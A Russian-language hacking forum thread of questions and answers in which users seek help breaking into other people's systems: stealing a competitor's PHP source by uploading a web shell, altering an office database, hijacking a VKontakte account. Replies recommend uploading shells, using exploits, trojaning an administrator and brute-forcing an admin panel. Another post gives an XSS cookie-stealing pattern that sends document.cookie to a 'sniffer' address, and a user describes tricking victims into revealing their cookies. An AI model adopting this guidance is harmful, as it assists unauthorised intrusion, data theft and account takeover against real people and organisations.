1. На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.
Скрыть объявление
Привет, Незнакомец! У тебя есть возможность Оставить комментарий в теме

Все вопросы сюда!

Тема в разделе "H4X S0FTW4RE", создана пользователем ddd, 31 май 2007.

1. influxe 0x04

influxe
    Симпатии:
    0
    http://vbobr.narod.ru/programs/ICQToolZSEII.rar
    эта программа для узнаваения IP по намеру аське, так же вы можете кидать бомбу и другие навороты
    нуна такая прога только не залаевайте пл3 на карелитку или как там у мну не качает от туда=(

2. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

ddd
    TS
    Команда форума WebOwner WebVoice
    Симпатии:
    191
    Эта прога если где и есть, то давно уже не пашет. И больше всего уверен что это просто троян из серии регатель 4-ех знаков и т.п.

ЗЫ: просто протокол аськи часто меняется. А про эту прогу, инфа 2005 года.

Если что-то хочешь скачать, а сЫлка токо на диск карелию, либо есть еще и на файловое хранилище, но она не пашет, то пиши в лс. Перезалью.

3. Lamborghini Murcielago 0x16

Lamborghini Murcielago
    Симпатии:
    0
    Есть один очень конченный фан сайт ... я там пропалил IP .... как считаете пройтись спамом или не стоет расковать ??

4. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

ddd
    TS
    Симпатии:
    191
    Если я понимаю слово "конченнЫй" правильно, то боятся нечего :)

5. Lamborghini Murcielago 0x16

Lamborghini Murcielago
    Симпатии:
    0
    все правильно...админ гад банит всех подряд ... не моется .. устроил культ личности...все в одном...пора бы его наказать...:D

6. Cyclone 0x04

Cyclone
    Симпатии:
    0
    Всем привет !! У меня вопрос - есть ли способ скопировать содержимое корневой папки с ftp сайта ?? а именно php скрипты ? если известны пути к ней !и звестны пути к скриптам и всему остальному ... как посмотреть код или же сохранить скрипты ?

7. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

ddd
    TS
    Симпатии:
    191
    Здарова :) Отвечаю по порядку задавания вопросов, не используя заумнЫе слова :)
    Как я понял тЫ хочешь с левого сайта слить все скриптЫ. Чтоб скопировать содержимое корневой папки с ftp сайта, надо иметь к этому фтп доступ, а именно login и pass.
    Либо ищи баги на сайте, заливай шел и сливай что тебе надо :)
    Исходники php скриптов с сайта посмотреть не сможешь, токо html код :)

8. Cyclone 0x04

Cyclone
    Симпатии:
    0
    я знаю где какие права стоят , где 777 где остальное ..
    причем я могу бродить по корневой папке как хочу и куда захочу указывая пути , защиты нет вообще , пока :)

к примеру заходя по адресу http://*****/include/ виже следующее ... на этой папке стоят права 777 , есть папка на которой стоят 777 права на вложенных файлах как это можно использовать ?

# class_myguests.php
    # class_page.php
    # class_poll.php
    # class_radcodes.php
    # class_ses.php
    # class_upload.php
    # class_url.php
    # class_user.php
    # database_config.php
    и.т.д

просматриваю ccs таблицы и.т.д но при открытии файлов PHP выдается пустая страница...

можно пример как залить к примеру phpRemoteView ?

или есть более простой способ слить php скрипт ?

ЗЫ : учитывая то что имею такой же сайт с таким же движком .. зная что где лежит . надеюсь есть шанс скопировать код конкурента )

9. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

ddd
    TS
    Симпатии:
    191
    Еслиб все так просто бЫло, мояб бабушка сайтЫ дефейсила и т.п. :)
    Если знаешь что за двиг, то попробуй сплойтЫ поискать. Либо сам баги в коде поищи.
    Если админ проекта лох то протроянить его можно. Как бЫ способов то много, токо не все смогут подойти для решения конкретной задачи :)
    Да и не факт что после того как тЫ скачаешь все скриптЫ которЫе тебе нужнЫ, будут в читаемом виде. Если доработка их, и она очень ценна, то они могли и шифронуть все :)
    Вообщем все зависет от ситуации.

10. Cyclone 0x04

Cyclone
    Симпатии:
    0
    Посмотрим что можно сделать - спасибо за ответ )

11. SaTaN 0x04

SaTaN
    Симпатии:
    0
    у меня ситуация похожая на ту что была у SPAMer. по-порядку:
    1. я мало понимаю во взломе но смыслю в компах.
    2. мне нужно получить доступ к базе данных с правами администратора. при этом знаю следующее: чтобы войти туда мне нужно жестко прописать сетку (ИП, шлюзы и т.д.), доступ осуществляется через веб-форму и любой броузер и только из служебных кабинетов (если я пытаюсь так же настроить комп вне здания то не попадаю в базу).
    3. у меня есть несколько логинов и паролей к ним но с очень ограниченными правами (только просмотр).
    если это возможно, то подскажите, пожалуйста, как...

12. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

ddd
    TS
    Симпатии:
    191
    SaTaN, эммм, есть какой-то офис, там есть сетка, а в ней есть сервак с веб админкой, в которую можно попасть токо с определенного диапазона ип адресов?

В общем по детальней опиши.
    • Есть ли вай фай.
    • Хочешь удаленно, или с того же здания, только не из служебнЫх кабинетов.
    • Что тебе от базЫ надо, слить её, или что-то поменять там.
    ЗЫ: это не так то просто будет ))
    ЗЫ2: давнЫм давно, в универе, спалился за этим делом ))

13. SaTaN 0x04

SaTaN
    Симпатии:
    0
    ddd, есть несколько офисов разбросанных по городу. диапазон ИП 10.11.2.1 - 10.11.2.255. основной шлюз 10.11.2.1. ДНС сервер 10.11.2.238. попадать не из офиса необязательно. доступ в офис у меня пока есть. вай фая нету точно (на самом серваке где база). слить базу мне, в принципе, не нужно (боюсь она будет очень большой хотя стоить, если ее слить и суметь продать, будет наверное немало) нужно делать в ней изменения и добавления. дабы не спалить комп по мак адресу могу пользоваться ноутом (знаю есть еще способы подмены ИП но никогда не занимался). вобщем если это возможно - готов слушать а, при успешном окончании... из достоверных источников (сам видел) знаю, что прецеденты были но палили только ИП и сами изменения, уровень людей обслуживающих базу наверное пониже моего (может есть там конечно один какой-то гений и то тот который саму базу написал). доступ в базу происходит через браузер где вместо веб адреса указываешь 10.30.1.24. вроде все если не все спроси конкретно, может что-то забыл... заранее спасибо.

P.S. мыло: nxm@km.ru tam_gde_nas@ukr.net (так на всякий...)

14. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

ddd
    TS
    Симпатии:
    191
    SaTaN, ну как там? Брутанул админку?)

15. SaTaN 0x04

SaTaN
    Симпатии:
    0
    ddd, пока нет. я толком не понял как это делать. напиши типа "для чайников" на мыло плз

16. Lero4ka^^ IPv6

Lero4ka^^
    WebVoice
    Симпатии:
    3
    а вы можете помочь взломать профиль вконтакте, как бы почта есть, пароль нужен :)

17. Neuromancer Neuromancer

Neuromancer
    WebVoice
    Симпатии:
    3
    - Ну глупые вбивают в гугле: "брутфорс в контакте"
    - Умные идут изучать язык программирования и заканчивают среднюю школу с отличием по математике.
    - Мудрецы кладут аппарат на взлом соц. ресов., таких как контакт :) ИМХО(С) не забыл написать, значит не дурак:)

18. Cyclone 0x04

Cyclone
    Симпатии:
    0
    всегда ломаю непосредственно комп ... впихиваю левую ссылку с трояном.. а дальше как дело пойдет ... ))

хотя и были ОриГиналы ... которые сами мне куки давали ))))нужно было только попросить вставить в адресную строку javasсript:document.сооkiе; и попросить результат ))хи)

19. bug1z 0x04

bug1z
    Симпатии:
    1
    Хэкер мля=/
    А дело пойдет только с ламером!!!!111
    javasсript:document.сооkiе - это атака вида xss, которая направлена на пользователя, вот только когда ты пихаешь в уязвимое место скрипт вида ...javasсript:document.сооkiе..., ты видишь свои куки, а чтоб украсть чужие, нужно вписать код вида ...javasсript:"Адрес снифера"+document.сооkiе...
    В общем лол =/

20. Neuromancer Neuromancer

Neuromancer
    WebVoice
    Симпатии:
    3
    Существует возможность глянуть базу данных ЗАГСа?